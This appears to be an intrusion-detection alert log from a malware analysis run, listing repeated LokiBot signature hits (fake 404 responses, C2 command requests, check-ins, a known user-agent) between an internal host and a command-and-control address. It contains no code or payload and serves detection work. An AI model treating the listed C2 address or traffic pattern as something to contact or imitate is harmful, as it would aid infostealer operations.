2025-02-20T15:08:28.437803+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:30.447083+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:32.416537+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50049	104.21.80.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:33.750253+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49712	TCP
2025-02-20T15:06:35.758107+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49719	TCP
2025-02-20T15:06:37.740651+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49730	TCP
2025-02-20T15:06:41.757122+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49758	TCP
2025-02-20T15:06:45.780149+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49789	TCP
2025-02-20T15:06:47.894768+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49806	TCP
2025-02-20T15:06:49.879296+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49820	TCP
2025-02-20T15:06:53.862664+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49847	TCP
2025-02-20T15:06:55.844992+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49859	TCP
2025-02-20T15:06:58.027100+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49872	TCP
2025-02-20T15:06:59.874420+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49884	TCP
2025-02-20T15:07:02.756796+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49897	TCP
2025-02-20T15:07:04.720213+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49912	TCP
2025-02-20T15:07:06.713979+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49923	TCP
2025-02-20T15:07:08.776089+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49938	TCP
2025-02-20T15:07:10.641582+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49951	TCP
2025-02-20T15:07:12.656657+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49961	TCP
2025-02-20T15:07:14.471578+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49974	TCP
2025-02-20T15:07:18.406522+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	49998	TCP
2025-02-20T15:07:22.304230+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50010	TCP
2025-02-20T15:07:26.172922+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50012	TCP
2025-02-20T15:07:28.044405+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50013	TCP
2025-02-20T15:07:29.929180+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50014	TCP
2025-02-20T15:07:33.875320+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50017	TCP
2025-02-20T15:07:37.740209+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50019	TCP
2025-02-20T15:07:39.719826+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50020	TCP
2025-02-20T15:07:41.679249+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50021	TCP
2025-02-20T15:07:43.658699+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50022	TCP
2025-02-20T15:07:45.621485+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50023	TCP
2025-02-20T15:07:47.850549+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50025	TCP
2025-02-20T15:07:49.790448+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50026	TCP
2025-02-20T15:07:51.735062+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50027	TCP
2025-02-20T15:07:53.718153+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50028	TCP
2025-02-20T15:07:55.596523+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50029	TCP
2025-02-20T15:07:59.615829+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50031	TCP
2025-02-20T15:08:03.588220+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50033	TCP
2025-02-20T15:08:05.513428+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50034	TCP
2025-02-20T15:08:07.584891+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50036	TCP
2025-02-20T15:08:11.592353+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50038	TCP
2025-02-20T15:08:13.590884+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50039	TCP
2025-02-20T15:08:15.632064+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50040	TCP
2025-02-20T15:08:17.610736+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50041	TCP
2025-02-20T15:08:29.252883+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50047	TCP
2025-02-20T15:08:31.246274+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50048	TCP
2025-02-20T15:08:33.268248+0100	2025483	1	A Network Trojan was detected	104.21.80.1	80	192.168.2.6	50049	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:33.745179+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:35.752990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:37.735651+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:39.690280+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:41.668278+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:43.754362+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:45.774988+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:47.888815+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:49.874210+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:51.783915+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:53.857548+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:55.803929+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:58.022033+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:59.869131+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:07:02.752348+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:04.715146+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:06.708944+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:08.770999+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:10.625118+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:12.651602+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:14.466573+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:16.371559+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:18.401403+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:20.290539+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:22.299094+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:24.196182+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:26.167859+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:28.038526+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:29.916993+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:31.846949+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:33.870284+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:35.752737+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:37.735096+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:39.714801+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:41.672229+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:43.653614+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:45.616285+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:47.845405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:49.785396+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:51.729949+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:53.713076+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:55.591383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:57.503817+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:59.610783+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:08:01.538370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:03.583169+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:05.508007+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:07.579901+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:09.585159+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:11.587148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:13.585877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:15.626305+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:17.605130+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:19.519832+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:21.480011+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:23.425796+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:25.336034+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:27.274514+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:29.245218+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:31.241230+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:33.261508+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50049	104.21.80.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:30.081385+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:34.912048+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:37.017142+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:38.915989+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:43.038217+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:47.032685+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:49.052569+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:51.051090+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:55.022125+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:57.236548+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:59.191949+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:07:01.021173+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:03.956144+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:05.878161+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:07.973258+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:09.964814+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:11.940214+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:13.832444+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:15.638534+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:19.553017+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:23.458173+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:27.330956+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:29.206393+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:31.094570+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:35.033842+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:38.927592+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:40.878181+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:42.845534+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:44.825217+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:47.038071+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:49.004232+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:50.942877+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:52.911840+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:54.881380+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:56.772588+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:08:00.794678+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:04.747632+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:06.689667+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:08.766512+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:12.769111+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:14.749379+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:16.794399+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:18.771827+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:28.437803+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50047	104.21.80.1	80	TCP
2025-02-20T15:08:30.447083+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:32.416537+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50049	104.21.80.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:30.081385+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:34.912048+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:37.017142+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:38.915989+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:43.038217+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:47.032685+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:49.052569+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:51.051090+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:55.022125+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:57.236548+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:59.191949+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:07:01.021173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:03.956144+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:05.878161+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:07.973258+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:09.964814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:11.940214+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:13.832444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:15.638534+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:19.553017+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:23.458173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:27.330956+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:29.206393+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:31.094570+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:35.033842+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:38.927592+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:40.878181+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:42.845534+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:44.825217+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:47.038071+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:49.004232+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:50.942877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:52.911840+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:54.881380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:56.772588+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:08:00.794678+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:04.747632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:06.689667+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:08.766512+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:12.769111+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:14.749379+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:16.794399+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:18.771827+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50046	104.21.80.1	80	TCP
2025-02-20T15:08:28.437803+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50047	104.21.80.1	80	TCP
